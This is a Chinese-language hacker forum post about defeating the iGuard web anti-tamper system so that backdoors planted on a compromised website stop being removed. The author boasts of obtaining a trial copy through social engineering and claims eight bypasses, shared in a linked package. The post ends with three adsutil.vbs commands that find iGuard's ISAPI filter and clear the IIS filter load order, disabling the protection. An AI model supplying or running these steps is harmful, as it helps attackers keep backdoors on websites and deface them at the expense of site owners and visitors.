前段时间在搞一个受到网页防篡改保护的网站,之前不知道有这东西,后来在植入web后门的时候,老是被删掉,郁闷...
困扰了整整一天后,在翻看C盘时,发现根目录下一个奇怪的文件夹"Tercel",找了几个文件研究,才知道这里有一个叫iGuard的网页防篡改...汗死..不懂这东西,立即google恶补下,找到官网,居然不提供下载,囧~~
不过,根据我的经验,不提供下载的软件基本上都会有一堆毛病,哈哈...
之后通过社工骗取了一套试用版,接下来的2天里,通过在虚拟机中反复测试,终于把这东西的原理摸熟了,并找到8种办法突破iGuard的保护,其中有几种不用管理员权限就能突破.2天的成果,分享出来让后来者少走弯路,以后再遇到这种系统保护的网站要绕过它就轻车熟路了.
这里先简单说下iGuard的原理,这东西会在IIS/Apache中安插一个ISAPI过滤器(ISAPI Filter)/Apache模块,这个模块对你请求的每一个网页都计算一下它的MD5值,然后跟自己MD5库中记录的进行比较,如果一致就说明没有篡改,放行通过,如果不一致,就拦截,并立即恢复网页(这也是为什么之前我在网页中插入后门,然后访问后门,就会立即被删除的原因).
OK,知己知彼,百战不殆,在理解了它的原理后,要对付它就容易多了,何况这个iGuard设计上就有众多安全隐患.
因为突破方法比较多,所以我打包成一个rar(视频+文字解说).
邪8这里上传15MB的附件老是出错,郁闷,没法子,只好放过地方了,下载地址:
如果比较懒,不想看详细视频演示资料,可以直接用下面的这个方法让iGuard失效:
原理:因为iGuard 数字水印检测功能的实现,完全依赖于一个 ISAPI 筛选器模块,只要把这个筛选器删除,就可以让篡改网页随意留出了...不管这个iGuard是不是双机部署,不管采取什么水印,立刻统统失效.
操作:用下面三条cmd命令,就可以把iGuard的 ISAPI 筛选器模块删掉.
复制内容到剪贴板
<code>//cmd 查找 iGuard 的 ISAPI 筛选器模块,同时获取网站ID... cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs enum_all w3svc /p | find "iguard" /i //cmd 获取指定网站的 FilterLoadOrder 序列... cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs get w3svc/xxx/filters/FilterLoadOrder //cmd 设置新的 FilterLoadOrder 序列到指定网站... cscript.exe %SystemDrive%\Inetpub\AdminScripts\adsutil.vbs set w3svc/xxx/filters/FilterLoadOrder ""</code>
删除iGuard的 ISAPI 筛选器模块后,咱们就可以随意修改网页了,hoho~~